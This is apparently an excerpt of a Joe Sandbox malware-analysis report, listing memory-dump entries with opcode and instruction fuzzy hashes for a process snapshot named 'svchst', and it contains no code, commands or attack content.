                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f63b9311145591502f94b6b65c9324a4c2dbcbcb848d12ded01275c3e9728c8
                                        • Instruction ID: 9db58f0922ad9a0bc08df5db09460e7f8945f3a6c7342038d99ebe986ec4491d
                                        • Opcode Fuzzy Hash: 5f63b9311145591502f94b6b65c9324a4c2dbcbcb848d12ded01275c3e9728c8
                                        • Instruction Fuzzy Hash: AE01C4B09002299BDB24CF94C988BE8B7B1BB49304F5040A9D20AA7290C3B95EC5DF10
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf428e6d09405c8b612ffcdd4ff78b8cf4e50e0c435c62235feef3c079cb1205
                                        • Instruction ID: 42651812da63bf96881c9cfca5b66526df45bd41167be1ea51283b809af22fb8
                                        • Opcode Fuzzy Hash: bf428e6d09405c8b612ffcdd4ff78b8cf4e50e0c435c62235feef3c079cb1205
                                        • Instruction Fuzzy Hash: 831125B4942228CFEB65CF64D988BDCBBB1BB09301F1080D9D50AA72A0D7769EC1CF14
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f9ee0ee703d5be92542da9706c741f276b37f4eb67ef5c26d52c66683f44680
                                        • Instruction ID: 4305c54cd681e8f5690e6dc9872257e5380e197c642bde1e8c2c2e89ff2c730e
                                        • Opcode Fuzzy Hash: 7f9ee0ee703d5be92542da9706c741f276b37f4eb67ef5c26d52c66683f44680
                                        • Instruction Fuzzy Hash: 43013AB4A026288FDB64CF64DD98BD9B7B5AB59311F4080E9E90DA3260D7786EC49F10
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19db1d65a2b9916a6c349348f972c48827466326dc7e4662c0a6dfb45c548822
                                        • Instruction ID: 0dafaacd9d754bb3d4481779373b8d9ddaf74f30002b7de66401ebb33b28932e
                                        • Opcode Fuzzy Hash: 19db1d65a2b9916a6c349348f972c48827466326dc7e4662c0a6dfb45c548822
                                        • Instruction Fuzzy Hash: DBF0307480A388AFCB16DFB4D5155DCBFB1AF06300F10C1FAD840572A1C3398A99DB41
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c92ef2a7e62beffc866547e166e715c94b6b96e3cdd283fa76d4b4ca01699b69
                                        • Instruction ID: 59d004e1ab11ffd05536b24be8a01b7c145bf6bc2fafa57f2519418ab5b00275
                                        • Opcode Fuzzy Hash: c92ef2a7e62beffc866547e166e715c94b6b96e3cdd283fa76d4b4ca01699b69
                                        • Instruction Fuzzy Hash: 8FF0A5B4901269DFDB64CF64DD88BE8B7B1BB5A300F5080E9D509A32A0C7B85EC4DF10
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ed565d0e9f569f0f14494ed455d60e548669e285da0b3097388e06d7d86f123
                                        • Instruction ID: d4f939d4657b2c1a1af818da63cfd7242c27118cad426f00701fc0d0dce137ac
                                        • Opcode Fuzzy Hash: 0ed565d0e9f569f0f14494ed455d60e548669e285da0b3097388e06d7d86f123
                                        • Instruction Fuzzy Hash: 57E086614092D04FF7125374EC27B903FB0472B314F0981EED555864F3C66D044ADB16
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: edd618dfe4b8af50527d4adc1f6641070e1927155dd92eb8839c26ce14b9cbc8
                                        • Instruction ID: 35783317fd9e652423caf99cd2f57b68f06952b478b3e9e75d151cf011ee0cd2
                                        • Opcode Fuzzy Hash: edd618dfe4b8af50527d4adc1f6641070e1927155dd92eb8839c26ce14b9cbc8
                                        • Instruction Fuzzy Hash: 25F0A5B4901668DFDB208F54DD887D8B7B5BB99306F0044D9E109A7290C7B95EC49F24
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3056924938cb6b8b3eb7e4ddc451220202fb7a734afbdd603cbde90912a0acbe
                                        • Instruction ID: a17e3f5251000d7e3e60b71a2f9578deb4048917ac98cac28e54248b61b62476
                                        • Opcode Fuzzy Hash: 3056924938cb6b8b3eb7e4ddc451220202fb7a734afbdd603cbde90912a0acbe
                                        • Instruction Fuzzy Hash: AFE01274C04308EBCB16EFA4D904AACBBB5BB44300F10C2AAE85026250C7399A90EB84
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 271369e0e939fc52e98152c0dc8809247fc8f7dac899cfe67c1f1b8ba5c792d2
                                        • Instruction ID: f5938c401f44501b653c4fc94cb29abde662f5ec5503603e0bd1c908d2e5c717
                                        • Opcode Fuzzy Hash: 271369e0e939fc52e98152c0dc8809247fc8f7dac899cfe67c1f1b8ba5c792d2
                                        • Instruction Fuzzy Hash: E7D0177280120CEBEB00EFA0D901A9AB7F8AB4B200F4046A9A504D3160EB719E449B95
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2088ba446dc76ccad577a2404c2e757e19dffd4f4405417e204f43ccd3b8dc24
                                        • Instruction ID: 3d17dde79a1858ce6b74f14317309b9e984f539ed9f83d4943ffe77e83116bbe
                                        • Opcode Fuzzy Hash: 2088ba446dc76ccad577a2404c2e757e19dffd4f4405417e204f43ccd3b8dc24
                                        • Instruction Fuzzy Hash: 95E01775900208EFCB44DFA4E908E59BBB8FB0A311F108198F80857361C732EE50EBA5
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6522f078aded3bf810f603d8a487b5bbe0d4fc2f95cfedc239f5c0c44fc7cd9
                                        • Instruction ID: a83764715a132c6d8cbbb85ce02b9b24851900cbb5b6adc322563952a106e049
                                        • Opcode Fuzzy Hash: d6522f078aded3bf810f603d8a487b5bbe0d4fc2f95cfedc239f5c0c44fc7cd9
                                        • Instruction Fuzzy Hash: 17F02B7590522CCFDB218F20D988BDCBBB5AB58301F1080DA980AA32A1D7351FC4DF65
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76a7fe1f2c9912f144b4be906268d4093de9fd4d00283f8a8833f2ecd595053d
                                        • Instruction ID: 169449bfe0b6e4b975e0c8071751fc4cb4600bd3b352665f3972ff7bdfd9a135
                                        • Opcode Fuzzy Hash: 76a7fe1f2c9912f144b4be906268d4093de9fd4d00283f8a8833f2ecd595053d
                                        • Instruction Fuzzy Hash: E9E01274910208DFC744DFA4E545D5DBBB4FB49315F1481E8D80857360C730AE44DB85
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90bf3a3e7963364d66fe4e9c80718bbb5a847fa858d8b2e9b101a05c316198a1
                                        • Instruction ID: fdbf48fd0909cef83c264c3192ea7fe07db65027b26c4d229d6c5edfb659f6e5
                                        • Opcode Fuzzy Hash: 90bf3a3e7963364d66fe4e9c80718bbb5a847fa858d8b2e9b101a05c316198a1
                                        • Instruction Fuzzy Hash: 05E048749012289BDB218F90DD88AEEBBB1BB09300F108199E50AA7260D7361EC5EF00
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14411b530a0dd61ec53916101ee7338215c2a822bd2060477d732429d8d42048
                                        • Instruction ID: af22f15e4e9953aa8ef05942a6a0c3a42826530b59429fbc03d57f51e6082168
                                        • Opcode Fuzzy Hash: 14411b530a0dd61ec53916101ee7338215c2a822bd2060477d732429d8d42048
                                        • Instruction Fuzzy Hash: 95D0A9B0C01208EFC780DFA8E808B9DB7F8EB0A300F0088A9A808C3210E7355E00EB80
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b685fbbded9e19c596c48144fbcff0d53bf198f91840a1c939d678367753348f
                                        • Instruction ID: 9bb3ecdb129b9a472e1f88b522a9ad90c8f9ca8f22acc1c4ef9c58f1617f91f3
                                        • Opcode Fuzzy Hash: b685fbbded9e19c596c48144fbcff0d53bf198f91840a1c939d678367753348f
                                        • Instruction Fuzzy Hash: 33C08C3004860886DA1017417C4DB3BB3FCA302701F804818B908128A24BB8A451A5A9
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce580c098ea89679fb23a382e555bbc832d3b4fa0cc07ca7a14d39d242155ad5
                                        • Instruction ID: 4810d292fc0aa2355c471022def45abd8e8b3a3c02c2297f547bdd583e9609d0
                                        • Opcode Fuzzy Hash: ce580c098ea89679fb23a382e555bbc832d3b4fa0cc07ca7a14d39d242155ad5
                                        • Instruction Fuzzy Hash: DFD0A7600042A44AE71163A0BC1BF203BF85315314F48805CD64A421A2CBAD1884CB59
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6892ef522e38b6fcb7eb6314d71f8c945fe315b0919c9f9838c1e6d67ad84c6
                                        • Instruction ID: d3215de20a5a02049769aeb7ff0fce88a2d93aedd2d816ff878ae7c70cef18f2
                                        • Opcode Fuzzy Hash: e6892ef522e38b6fcb7eb6314d71f8c945fe315b0919c9f9838c1e6d67ad84c6
                                        • Instruction Fuzzy Hash: 3AC02B7000131447D1541B90F80CB7077FC734F305F445425B11C938B087F86441C5DC
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 552c92c0cdc810862013dc00c22114028e3b20522462f08205779799a4b8b435
                                        • Instruction ID: 54e54b3823fbaa1ffab8d81dd3accbb01e4b81b3bc78b555de901163e40c7cb8
                                        • Opcode Fuzzy Hash: 552c92c0cdc810862013dc00c22114028e3b20522462f08205779799a4b8b435
                                        • Instruction Fuzzy Hash: 03B022300003288BE2202B80B80CB30B3FCB30A302F88082AA20C028B08BF88800C2C8
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.1800519071.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_aa0000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab6c929de5b7c74f53d7b64ebaa34d061a9875f8ad9545afc6f39d85b4df5f44
                                        • Instruction ID: f3aee51f764813137761999e96893a9547b5ad73f0a48da89e0576614b37378b
                                        • Opcode Fuzzy Hash: ab6c929de5b7c74f53d7b64ebaa34d061a9875f8ad9545afc6f39d85b4df5f44
                                        • Instruction Fuzzy Hash: 09C0EA38A46718DBEB608B10D888B9DBB35AB8A701F208085D84A262A58A7519C4DE00